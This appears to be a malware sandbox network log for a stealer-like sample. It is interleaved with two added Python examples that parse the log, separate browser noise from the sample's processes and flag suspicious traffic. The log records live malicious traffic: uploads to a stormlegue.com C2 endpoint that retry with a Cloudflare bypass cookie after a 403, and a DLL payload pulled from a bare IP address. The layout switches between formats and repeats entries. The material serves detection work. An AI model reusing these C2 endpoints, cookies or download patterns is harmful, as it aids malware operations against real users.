                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42744&min_rtt=42095&rtt_var=9739&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=770&delivery_rate=90286&cwnd=253&unsent_bytes=0&cid=407849f11aff5ae6&ts=275&x=0"
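The records above are raw sandbox output, so here is an added example (written for this page, not code from tria.ge or from any tool it names) of how a detection engineer can parse records in this shape and flag the two behaviours they show: an .exe fetched over plain HTTP from a bare IPv4 address and served as application/octet-stream (futors.exe pulling monthdragon.exe), and a non-browser process (monthdragon.exe) POSTing to /api with a Chrome User-Agent, first application/x-www-form-urlencoded and then multipart/form-data, where the first cookie-less POST was refused with 403 and the retry carrying the __cf_mw_byp cookie was answered 200. The embedded record sample is a constructed, trimmed copy of three records from this report in the same line layout; the finding labels, the BROWSERS set and the regular expressions are the example's own assumptions, not tria.ge signatures, and DNS records are skipped by the parser.

```python
import re
from collections import namedtuple
from urllib.parse import urlparse

# Constructed sample: a trimmed copy of three HTTP records from the report above, same line layout.
SAMPLE = """\
• flag-ru
GET
http://185.215.113.97/files/FuckMAIN/monthdragon.exe
futors.exe
Remote address:
185.215.113.97:80
Request
GET /files/FuckMAIN/monthdragon.exe HTTP/1.1
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
• flag-us
POST
https://stormlegue.com/api
monthdragon.exe
Remote address:
104.21.16.1:443
Request
POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Response
HTTP/1.1 403 Forbidden
• flag-us
POST
https://stormlegue.com/api
monthdragon.exe
Remote address:
104.21.16.1:443
Request
POST /api HTTP/1.1
Content-Type: multipart/form-data; boundary=PG058E5YD88Y3RMW7
Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Response
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=fqh0qa4p1suhsdu3v4nkkvm8es; path=/
"""

# remote is the "ip:port" printed under "Remote address:"; header dicts are keyed by lower-cased name
HttpRecord = namedtuple("HttpRecord", "method url process remote req_headers status resp_headers")

def _headers(lines):
    """'Name: value' lines to a dict keyed by lower-cased name; lines without a colon are ignored."""
    pairs = (ln.partition(":") for ln in lines)
    return {name.strip().lower(): value.strip() for name, sep, value in pairs if sep}

def parse_report(text):
    """Split the report on its '• flag-xx' bullets and keep the HTTP records (DNS records are skipped)."""
    records = []
    for chunk in re.split(r"^[ \t]*• flag-\w+[ \t]*$", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if len(lines) < 7 or lines[0] not in ("GET", "POST") or "Request" not in lines:
            continue
        req_at = lines.index("Request")  # request line, then request headers, until "Response"
        resp_at = lines.index("Response") if "Response" in lines else len(lines)
        m = re.match(r"HTTP/\d\.\d (\d{3})", lines[resp_at + 1]) if resp_at + 1 < len(lines) else None
        records.append(HttpRecord(lines[0], lines[1], lines[2], lines[4], _headers(lines[req_at + 2:resp_at]),
                                  int(m.group(1)) if m else None, _headers(lines[resp_at + 2:])))
    return records

BROWSER_UA = re.compile(r"Mozilla/5\.0 .*(Chrome|Firefox)/")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}  # assumption: the sandbox's real browser processes

def triage(records):
    """Return (process, finding, url) triples for the behaviours visible in the report."""
    findings, refused = [], set()
    for r in records:
        host = urlparse(r.url).hostname or ""
        ctype = r.req_headers.get("content-type", "")
        # an executable served as an opaque binary over plain HTTP from a bare IPv4 address
        if (r.method == "GET" and r.url.startswith("http://") and re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host)
                and r.resp_headers.get("content-type") == "application/octet-stream"):
            findings.append((r.process, "payload-download", r.url))
        # non-browser process POSTing with a browser User-Agent: form bodies read as check-ins, multipart as uploads
        if (r.method == "POST" and r.process.lower() not in BROWSERS
                and BROWSER_UA.search(r.req_headers.get("user-agent", ""))):
            kind = "exfil-multipart" if ctype.startswith("multipart/form-data") else "c2-checkin"
            findings.append((r.process, kind, r.url))
        # the cookie-less POST /api was refused with 403 and the retry carrying a cookie got 200
        key = (r.process, r.url)
        if r.method == "POST" and r.status == 403 and "cookie" not in r.req_headers:
            refused.add(key)
        elif key in refused and r.status == 200 and "cookie" in r.req_headers:
            findings.append((r.process, "refused-then-accepted", r.url))
            refused.discard(key)
    return findings

def iocs(records):
    """Hosts and remote IPs contacted, for blocklists or retro-hunting."""
    return {h for r in records for h in (urlparse(r.url).hostname, r.remote.rsplit(":", 1)[0]) if h}

if __name__ == "__main__":
    print(*triage(parse_report(SAMPLE)), sorted(iocs(parse_report(SAMPLE))), sep="\n")
```

Run stand-alone it prints one payload-download finding for futors.exe, a c2-checkin, an exfil-multipart and a refused-then-accepted finding for monthdragon.exe, and the three contacted hosts. The process-versus-User-Agent test is what separates the stormlegue.com traffic from the firefox.exe DNS lookups that follow in the report: a browser claiming to be Chrome is unremarkable, a freshly downloaded .exe doing so is not. The thresholds and labels are starting points for this one report, not tuned rules.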
                                                                                            • flag-us
                                                                                              DNS
                                                                                              location.services.mozilla.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              location.services.mozilla.com
                                                                                              IN A
                                                                                              Response
                                                                                              location.services.mozilla.com
                                                                                              IN CNAME
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              35.190.72.216
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              35.244.181.201
                                                                                            • flag-us
                                                                                              DNS
  prod.classify-client.prod.webservices.mozgcp.net  (firefox.exe → 8.8.8.8:53)
    Request:  prod.classify-client.prod.webservices.mozgcp.net IN A
    Response: prod.classify-client.prod.webservices.mozgcp.net IN A 35.190.72.216

• [US] DNS  prod.balrog.prod.cloudops.mozgcp.net  (firefox.exe → 8.8.8.8:53)
    Request:  prod.balrog.prod.cloudops.mozgcp.net IN AAAA
    Response: prod.balrog.prod.cloudops.mozgcp.net IN AAAA 2600:1901:0:5133::

• [US] DNS  prod.classify-client.prod.webservices.mozgcp.net  (firefox.exe → 8.8.8.8:53)
    Request:  prod.classify-client.prod.webservices.mozgcp.net IN AAAA
    Response: (empty)

• [US] DNS  play.google.com  (firefox.exe → 8.8.8.8:53)
    Request:  play.google.com IN A
    Response: play.google.com IN A 142.250.178.14

• [US] DNS  fxreshideas.tech  (alex12112.exe → 8.8.8.8:53)
    Request:  fxreshideas.tech IN A
    Response: (empty)

• [GB] POST  https://play.google.com/log?hasfast=true&authuser=0&format=json  (firefox.exe → 142.250.178.14:443)
    Request:
      POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
      host: play.google.com
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
      accept: */*
      accept-language: en-US,en;q=0.5
      accept-encoding: gzip, deflate, br
      referer: https://consent.youtube.com/
      content-type: text/plain;charset=UTF-8
      content-length: 731
      origin: https://consent.youtube.com
      sec-fetch-dest: empty
      sec-fetch-mode: no-cors
      sec-fetch-site: cross-site
      te: trailers

• [US] DNS  play.google.com  (firefox.exe → 8.8.8.8:53)
    Request:  play.google.com IN AAAA
    Response: play.google.com IN AAAA 2a00:1450:4009:815::200e

• [US] DNS  redirector.gvt1.com  (firefox.exe → 8.8.8.8:53)
    Request:  redirector.gvt1.com IN A
    Response: redirector.gvt1.com IN A 142.250.187.206

• [US] DNS  ciscobinary.openh264.org  (firefox.exe → 8.8.8.8:53)
    Request:  ciscobinary.openh264.org IN A
    Response: ciscobinary.openh264.org IN CNAME a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
              a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com IN CNAME a17.rackcdn.com
              a17.rackcdn.com IN CNAME a17.rackcdn.com.mdc.edgesuite.net
              a17.rackcdn.com.mdc.edgesuite.net IN CNAME a19.dscg10.akamai.net
              a19.dscg10.akamai.net IN A 2.18.121.79
              a19.dscg10.akamai.net IN A 2.18.121.72

• [US] DNS  shiningrstars.help  (alex12112.exe → 8.8.8.8:53)
    Request:  shiningrstars.help IN A
    Response: (empty)

• [GB] GET  https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip  (firefox.exe → 142.250.187.206:443)
    Request:
      GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
      host: redirector.gvt1.com
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
      accept: */*
      accept-language: en-US,en;q=0.5
      accept-encoding: gzip, deflate, br
      te: trailers

• [US] DNS  redirector.gvt1.com  (firefox.exe → 8.8.8.8:53)
    Request:  redirector.gvt1.com IN A
    Response: redirector.gvt1.com IN A 142.250.187.206

• [NL] GET  http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip  (firefox.exe → 2.18.121.79:80)
    Request:
      GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
      Host: ciscobinary.openh264.org
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
    Response:
      HTTP/1.1 200 OK
      Last-Modified: Fri, 07 Feb 2025 06:41:47 GMT
      ETag: 09372174e83dbbf696ee732fd2e875bb
      Content-Length: 491284
      Accept-Ranges: bytes
      X-Timestamp: 1738910506.39727
      Content-Type: application/zip
      X-Trans-Id: tx590d7becdb574cad82cd8-0067a84dbedfw1
      Cache-Control: public, max-age=30445
      Expires: Thu, 20 Feb 2025 09:02:06 GMT
      Date: Thu, 20 Feb 2025 00:34:41 GMT
      Connection: keep-alive

• [US] DNS  a19.dscg10.akamai.net  (firefox.exe → 8.8.8.8:53)
    Request:  a19.dscg10.akamai.net IN A
    Response: a19.dscg10.akamai.net IN A 2.18.121.72
              a19.dscg10.akamai.net IN A 2.18.121.79

• [US] DNS  mercharena.biz  (alex12112.exe → 8.8.8.8:53)
    Request:  mercharena.biz IN A
    Response: (empty)

• [US] DNS  redirector.gvt1.com  (firefox.exe → 8.8.8.8:53)
    Request:  redirector.gvt1.com IN AAAA
    Response: redirector.gvt1.com IN AAAA 2a00:1450:4009:81f::200e

• [US] DNS  generalmills.pro  (alex12112.exe → 8.8.8.8:53)
    Request:  generalmills.pro IN A
    Response: (empty)

• [US] DNS  a19.dscg10.akamai.net  (firefox.exe → 8.8.8.8:53)
    Request:  a19.dscg10.akamai.net IN AAAA
    Response: a19.dscg10.akamai.net IN AAAA 2a02:26f0:1700:f::1737:a1b9
              a19.dscg10.akamai.net IN AAAA 2a02:26f0:1700:f::1737:a1d3

• [US] POST  https://stormlegue.com/api  (alex12112.exe → 104.21.16.1:443)
    Request:
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: stormlegue.com
    Response:
      HTTP/1.1 403 Forbidden
      Date: Thu, 20 Feb 2025 00:34:41 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQdkV8MvALGrDsd3PSJ%2F8U1hwoyMdVoO4oqUG7bHmG7hd%2B8fp%2BDbe7XCmxlTXp3%2B8F7CEL82PZh3HcbQQCvZayETSXuAYPkD8dLeGBLygvRLDR1ITROf6r5mBachZqH2yA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 914a6992dcd194ab-LHR
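The entries above carry the point a triage analyst wants from this report: alex12112.exe looks up fxreshideas.tech, shiningrstars.help, mercharena.biz and generalmills.pro and gets empty answers, then POSTs an 8-byte body to https://stormlegue.com/api, is refused with 403 by Cloudflare, and re-sends with a __cf_mw_byp cookie and a 46-byte body, receiving 200 and a PHPSESSID. Everything from firefox.exe (Mozilla, Google, Widevine, OpenH264) is sandbox noise. The Python below is an added example and is not part of the tria.ge report or its tooling: it parses this flattened network-log layout, separates the sample's own process from the browser noise, lists the names that did not resolve, and flags the 403-then-cookie-retry sequence. The sample input is constructed from entries on this page with most headers trimmed; the process-name set and the retry heuristic are the example's own assumptions.

```python
"""Parse a flattened tria.ge network log and triage it by process."""
import re
from dataclasses import dataclass, field

# Constructed sample: entries excerpted from the report above, one entry per string,
# with "|" standing in for the line breaks of the page layout (headers trimmed).
_ENTRIES = [
    "• flag-us|DNS|play.google.com|firefox.exe|Remote address:|8.8.8.8:53|Request|play.google.com|IN A|Response|play.google.com|IN A|142.250.178.14",
    "• flag-us|DNS|fxreshideas.tech|alex12112.exe|Remote address:|8.8.8.8:53|Request|fxreshideas.tech|IN A|Response",
    "• flag-us|DNS|shiningrstars.help|alex12112.exe|Remote address:|8.8.8.8:53|Request|shiningrstars.help|IN A|Response",
    "• flag-us|DNS|mercharena.biz|alex12112.exe|Remote address:|8.8.8.8:53|Request|mercharena.biz|IN A|Response",
    "• flag-us|POST|https://stormlegue.com/api|alex12112.exe|Remote address:|104.21.16.1:443|Request|POST /api HTTP/1.1|Content-Type: application/x-www-form-urlencoded|Content-Length: 8|Host: stormlegue.com|Response|HTTP/1.1 403 Forbidden|Server: cloudflare",
    "• flag-us|POST|https://stormlegue.com/api|alex12112.exe|Remote address:|104.21.16.1:443|Request|POST /api HTTP/1.1|Content-Type: application/x-www-form-urlencoded|Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api|Content-Length: 46|Host: stormlegue.com|Response|HTTP/1.1 200 OK|Set-Cookie: PHPSESSID=0lmvqblm8768bg33i986lj84hl; path=/",
]
SAMPLE = "\n".join(e.replace("|", "\n") for e in _ENTRIES)


@dataclass
class Event:
    kind: str        # "DNS", "GET", "POST", ...
    target: str      # queried name, or the full URL for HTTP
    process: str     # process that made the request
    remote: str      # "ip:port" the request went to
    request: list = field(default_factory=list)   # lines under "Request"
    response: list = field(default_factory=list)  # lines under "Response"

    def header(self, name):
        """Value of a request header (case-insensitive name match), or None."""
        prefix = name.lower() + ":"
        for line in self.request:
            if line.lower().startswith(prefix):
                return line.split(":", 1)[1].strip()
        return None

    @property
    def status(self):
        """HTTP status code from the response status line; None for DNS or no response."""
        m = re.match(r"HTTP/\S+ (\d{3})", self.response[0]) if self.response else None
        return int(m.group(1)) if m else None


def parse(text):
    """Split the flattened log on the "• flag-xx" markers and build Event records."""
    events = []
    for chunk in re.split(r"^• flag-\w+\n", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if len(lines) < 6 or lines[3] != "Remote address:":
            continue  # leading fragment or truncated entry: skip rather than guess
        ev = Event(kind=lines[0], target=lines[1], process=lines[2], remote=lines[4])
        if "Request" in lines and "Response" in lines:
            i, j = lines.index("Request"), lines.index("Response")
            ev.request, ev.response = lines[i + 1:j], lines[j + 1:]
        events.append(ev)
    return events


def dns_answers(ev):
    """Answer records of a DNS event as (name, type, value) triples; [] when empty."""
    r = ev.response
    return [tuple(r[k:k + 3]) for k in range(0, len(r) - 2, 3)]


def triage(events, sample_processes):
    """Summarise what the sample's own processes did, ignoring browser/OS noise."""
    report = {"unresolved": [], "resolved": [], "http": []}
    for ev in events:
        if ev.process not in sample_processes:
            continue
        if ev.kind == "DNS":
            bucket = "resolved" if dns_answers(ev) else "unresolved"
            report[bucket].append(ev.target)
        else:
            report["http"].append((ev.kind, ev.target, ev.remote, ev.status))
    return report


def cloudflare_retry(events):
    """Flag a 403 followed by a re-send of the same URL that adds a Cookie and gets 200.

    Heuristic (assumption of this example): a host that only answers once a
    challenge cookie is presented, to a non-browser process, deserves a closer look.
    """
    hits, last = [], {}
    for ev in events:
        if ev.kind == "DNS":
            continue
        key = (ev.process, ev.target)
        prev, cookie = last.get(key), ev.header("Cookie")
        if prev and prev.status == 403 and cookie and ev.status == 200:
            hits.append((ev.process, ev.target, cookie.split("=", 1)[0]))
        last[key] = ev
    return hits


if __name__ == "__main__":
    evs = parse(SAMPLE)
    print(triage(evs, {"alex12112.exe"}))
    print(cloudflare_retry(evs))
```

Feeding the full page text to parse() instead of SAMPLE works the same way, since the splitter keys on the "• flag-xx" markers and skips the partial entry at the top of a page section. Keying triage on the process name rather than on the destination is what keeps the Google and Mozilla traffic out of the IOC list.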
• [US] POST  https://stormlegue.com/api  (alex12112.exe → 104.21.16.1:443)
    Request:
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 46
      Host: stormlegue.com
    Response:
      HTTP/1.1 200 OK
      Date: Thu, 20 Feb 2025 00:34:42 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      Set-Cookie: PHPSESSID=0lmvqblm8768bg33i986lj84hl; expires=Fri, 21 Feb 2025 00:34:41 GMT; Max-Age=86400; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rjerjtpr5n%2FpxdvS%2BaRSnT7J6sjJ%2Bpds%2Fmx0mhwjFjJyOBcvU%2F0n8Yv6b1pNPNL%2B4QNBx28Gc7xRI2VBW%2B5vji4UG2IW1fjL32gNtNOPhiq%2Bk2wvgjxVXpU5%2F9Xb%2F%2FG2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69932cff94ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43143&min_rtt=41674&rtt_var=6787&sent=14&recv=11&lost=0&retrans=0&sent_bytes=8837&recv_bytes=1056&delivery_rate=217966&cwnd=255&unsent_bytes=0&cid=ddd0d43cb39b9a7f&ts=387&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=BOIR7NS2C8XV1N
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1634
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=5bekn3pl6ndtf30iefmsc60rtp; expires=Fri, 21 Feb 2025 00:34:42 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0C4DXcsmXMSk7vdyBPyHl3AViK0xfxLSdcCZkfhvkKJIpdEdofxfHzPpM4YjRox%2FZZoHXMPhzNu3eur3waUZeiysHIRqkgnohJtZnbe%2FNeHOYogknrC44QyYt1SGtK71Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69951e6494ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43145&min_rtt=41674&rtt_var=5094&sent=17&recv=15&lost=0&retrans=0&sent_bytes=10024&recv_bytes=3112&delivery_rate=217966&cwnd=255&unsent_bytes=0&cid=ddd0d43cb39b9a7f&ts=607&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              IN CNAME
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              74.125.105.7
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://r2---sn-aigl6ns6.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              74.125.105.7:443
                                                                                              Request
                                                                                              GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com HTTP/1.1
                                                                                              Host: r2---sn-aigl6ns6.gvt1.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              Accept: */*
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Connection: keep-alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Accept-Ranges: bytes
                                                                                              Cache-Control: public,max-age=86400
                                                                                              Content-Disposition: attachment
                                                                                              Content-Length: 14485862
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Type: application/zip
                                                                                              Etag: "1d3918c"
                                                                                              Server: downloads
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Xss-Protection: 0
                                                                                              Date: Thu, 20 Feb 2025 00:34:41 GMT
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                                                                                              Connection: keep-alive
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                                                                              Vary: Origin
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              74.125.105.7
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:4::7
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/success?substr=mixfour&s=three&sub=non
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /success?substr=mixfour&s=three&sub=non HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/info
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /info HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 21
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/update
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /update HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                              Content-Length: 99856
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/octet-stream
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
